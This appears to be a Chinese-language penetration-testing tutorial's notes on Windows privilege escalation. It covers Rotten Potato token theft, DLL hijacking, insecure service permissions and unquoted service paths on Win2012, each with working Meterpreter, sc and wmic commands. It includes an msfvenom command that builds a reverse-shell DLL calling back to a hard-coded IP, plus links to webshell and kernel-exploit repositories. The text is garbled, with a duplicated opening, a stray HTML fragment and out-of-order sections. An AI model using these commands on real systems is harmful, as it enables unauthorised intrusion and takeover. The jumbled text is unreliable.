- 不带引号服务路径安全问题
服务路径提权:Web权限或本地提权 - 不安全的服务权限配置问题
服务权限配置:Web权限或本地提权(Web几率小) - 补充说明:dll劫持提权及AlwaysInstallElevated等说明
dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋
AlwaysInstallElevated提权默认禁用配置,利用成功机会很少
演示案例: - 案例1:Win2012-烂土豆配合令牌窃取提权-Web权限
原理:参考上述图片内容,非服务类用户权限无法窃取成功(原理)
过程:上传烂土豆-执行烂土豆-利用窃取模块-窃取SYSTEM-成功
upload /root/potato.exe C:\Users\Public
cd C:\Users\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token “NT AUTHORITY\SYSTEM” - 案例2:Win2012-DLL劫持提权应用配合MSF-Web权限
原理:Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)
过程:信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll - 案例3:Win2012-不安全的服务权限配合MSF-本地权限
原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。
过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功
accesschk.exe -uwcqv “administrators” *
sc config “NewServiceName” binpath=”C:\Program.exe”
sc start “NewServiceName” - 案例4:Win2012-不带引号服务路径配合MSF-Web,本地权限
原理:当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。
过程:检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功
wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\“ |findstr /i /v “”” - https://github.com/tennc/webshell
https://www.sdbeta.com/wg/2020/0628/235361.html
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075">总结Windows提权知识点:
掌握:提权方法对应层面,提权方法对应系统版本,相关文件及后门免杀问题等
涉及资源:
https://github.com/tennc/webshell
https://www.sdbeta.com/wg/2020/0628/235361.html
https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
权限提升-烂土豆&dll劫持&引号路径&服务权限
必备知识点:
#令牌窃取配合烂土豆提权
单纯令牌窃取:Web权限或本地提权
如配合烂土豆提权:Web或数据库等权限
不带引号服务路径安全问题
服务路径提权:Web权限或本地提权
不安全的服务权限配置问题
服务权限配置:Web权限或本地提权(Web几率小)
补充说明:dll劫持提权及AlwaysInstallElevated等说明
dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋
AlwaysInstallElevated提权默认禁用配置,利用成功机会很少
演示案例:
- Win2012-烂土豆配合令牌窃取提权-Web权限
- Win2012-DLL劫持提权应用配合MSF-Web权限
- Win2012-不安全的服务权限配合MSF-本地权限
- Win2012-不带引号服务路径配合MSF-Web,本地权限
- 关于Windows相关知识点总结说明-权限层,系统层,防护层等